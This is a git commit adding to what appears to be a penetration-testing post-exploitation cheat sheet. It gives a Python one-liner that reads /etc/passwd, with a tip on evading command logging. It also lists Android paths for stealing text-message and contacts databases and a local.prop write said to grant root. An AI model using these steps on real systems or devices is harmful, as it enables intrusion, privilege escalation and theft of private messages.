Merge pull request #61 from Su1ph3r/master

Android/Python
This commit is contained in:
WebBreacher 2014-01-12 15:56:50 -08:00
commit 7b4206deb5
3 changed files with 52 additions and 2 deletions

View File

@ -18,3 +18,15 @@ python -c 'import pty; pty.spawn("/bin/bash")'```
***Print all ASCII characters*** ***Print all ASCII characters***
```python ```python
python -c 'import string; print string.printable'``` python -c 'import string; print string.printable'```
**Run OS commands through Python Interpreter**
```python
python -c 'import os; os.system("command here")'```
example:
```
python -c 'import os; os.system("cat /etc/passwd")'```
Remember that the python console does not log code by default, so you can run all post-exploit shenanigans through the python console for added stealth.
Also gets by certain environmental restrictions.

View File

@ -1,3 +1,35 @@
# Place Holder # Android
##Files to grab
###Text Messages (Needs Root):
```
/data/data/com.android.providers/telephony/databases/mmssms.db
/data/data/com.android.providers.telephony/databases/mmssms.db
```
###Contacts (Needs Root):
```
/data/data/android.providers.contacts/databases
```
###Local System Settings:
```
/data/local.prop
```
If you can write to this file the following line will grant root:
```
echo "ro.kernel.qemu=1" > /data/local.prop
```
###Device Settings:
```
/system/build.prop
```
Content coming. Feel free to submit ;-)

6
tech/mobile/index.md Normal file
View File

@ -0,0 +1,6 @@
# Mobile
Got a shell on a mobile device? Here's some things to do next.
* [Android](android.md) - Android Post Exploitation
* [iOS](ios.md) - iOS Post Exploitation